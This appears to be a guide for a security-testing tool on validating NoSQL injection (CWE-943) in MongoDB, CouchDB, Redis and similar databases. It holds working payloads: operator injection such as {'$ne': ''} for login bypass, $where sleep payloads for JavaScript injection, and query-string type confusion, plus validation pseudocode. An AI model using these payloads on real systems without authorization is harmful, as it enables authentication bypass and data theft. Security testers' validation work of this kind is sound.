Validate NoSQL injection vulnerabilities across MongoDB, Cassandra, CouchDB, Redis, and other NoSQL databases. Test operator injection, JavaScript injection, and query manipulation patterns. Use when testing CWE-943 (Improper Neutralization of Special Elements in Data Query Logic) and related NoSQL injection classes.
Validate NoSQL injection vulnerabilities by injecting special operators, JavaScript code, or malformed queries into user-controlled inputs and observing:
$ne, $gt, $regex)$where, mapReduce)Inject MongoDB query operators to manipulate query logic.
{"$ne": ""} — not equal empty, bypasses equality checks{"$gt": ""} — greater than empty, returns all matching documents{"$regex": ".*"} — regex wildcard match{"$or": [...]} — logical OR injectionExample Attack:
// Normal: {"username": "admin", "password": "secret"}
// Attack: {"username": "admin", "password": {"$ne": ""}}
// Effect: Returns admin user regardless of password
Inject JavaScript in databases supporting server-side execution.
Detection Methods:
$where clause injection: {"$where": "this.password.length > 0"}mapReduce function injection$function aggregation operator (MongoDB 4.4+)Example Attack:
// Payload: {"$where": "sleep(5000) || true"}
// Effect: 5-second delay if JS execution enabled
Exploit type confusion when arrays or objects are passed where strings expected.
Detection Methods:
username[$ne]= via query string (Express.js extended query parser)items[0]=maliciousInject into MongoDB aggregation pipelines.
Detection Methods:
$lookup injection for cross-collection access$out or $merge for write operations$group manipulation for data extraction| Database | Operator Injection | JS Injection | Boolean-Based | Time-Based |
|---|---|---|---|---|
| MongoDB | ✓ ($ne, $gt, $regex, $or) | ✓ ($where, mapReduce) | ✓ | ✓ (via $where sleep or heavy ops) |
| CouchDB | ✓ (view manipulation) | ✓ (design doc JS) | ✓ | Limited |
| Cassandra | Limited (CQL injection) | No | ✓ | Limited |
| Redis | Command injection patterns | Lua script injection | ✓ | ✓ (DEBUG SLEEP) |
| Elasticsearch | ✓ (query DSL manipulation) | ✓ (scripting if enabled) | ✓ | ✓ (script-based) |
| DynamoDB | Condition expression injection | No | ✓ | No |
Key Insight: NoSQL APIs typically accept JSON; look for object/array inputs where operators can be injected.
Operator Injection (Authentication Bypass):
# Baseline
baseline = post("/login", json={"username": "admin", "password": "wrong"})
# Expected: 401 Unauthorized
# Test with $ne operator
test = post("/login", json={"username": "admin", "password": {"$ne": ""}})
# If 200 OK: VALIDATED - operator injection bypassed auth
Operator Injection (Data Extraction):
# Baseline
baseline = get("/api/users?role=user")
# Expected: Returns only users with role="user"
# Test with $gt operator
test = get("/api/users?role[$gt]=")
# If returns more users: VALIDATED - operator injection expanded query
Boolean-Based Inference:
# True condition
true_resp = post("/api/search", json={"name": {"$regex": "^a"}})
# False condition
false_resp = post("/api/search", json={"name": {"$regex": "^zzzzz"}})
# Compare response lengths/content
if len(true_resp.text) != len(false_resp.text):
status = "VALIDATED"
JavaScript Injection (if enabled):
# Time-based test
baseline_time = measure(post("/api/query", json={"filter": "normal"}))
test_time = measure(post("/api/query", json={"$where": "sleep(5000) || true"}))
if test_time > baseline_time + 4.5:
status = "VALIDATED"
| Status | Meaning |
|---|---|
| VALIDATED | Clear NoSQLi indicators (auth bypass, data leak, JS execution, boolean/time diff) |
| FALSE_POSITIVE | No indicators; operators rejected or sanitized |
| PARTIAL | Weak signals (small differences, inconsistent results) |
| UNVALIDATED | Blocked, error, or insufficient evidence |
Capture minimal structured evidence (redact PII/secrets, truncate to 8KB, hash full response):
status, injection_type, cwe$out, db.dropDatabase())Validated examples:
NoSQL injection on /login - $ne operator bypassed password check (CWE-943). Admin access without credentials.
MongoDB $where injection on /api/search - sleep(5000) caused 5.1s delay (CWE-943). Server-side JS execution confirmed.
Operator injection on /api/users - $gt operator returned all users instead of filtered set (CWE-943).
Unvalidated example:
NoSQL injection test incomplete on /api/data - operators rejected with 400 Bad Request. Evidence: path/to/evidence.json
Primary CWE (DAST-testable):
Parent/Related CWEs (context):
Sibling CWEs under CWE-943 (for reference):
Related Attack Pattern:
Note: Unlike SQL injection (CWE-89), NoSQL injection does not have a dedicated base-level CWE. CWE-943 at the class level is the correct mapping for NoSQL injection vulnerabilities per MITRE guidance.
--noscripting)reference/nosql_payloads.py for NoSQLi payloads by database typereference/validate_nosqli.py for NoSQLi-focused validation flowexamples.md for concrete NoSQLi scenarios and evidence formats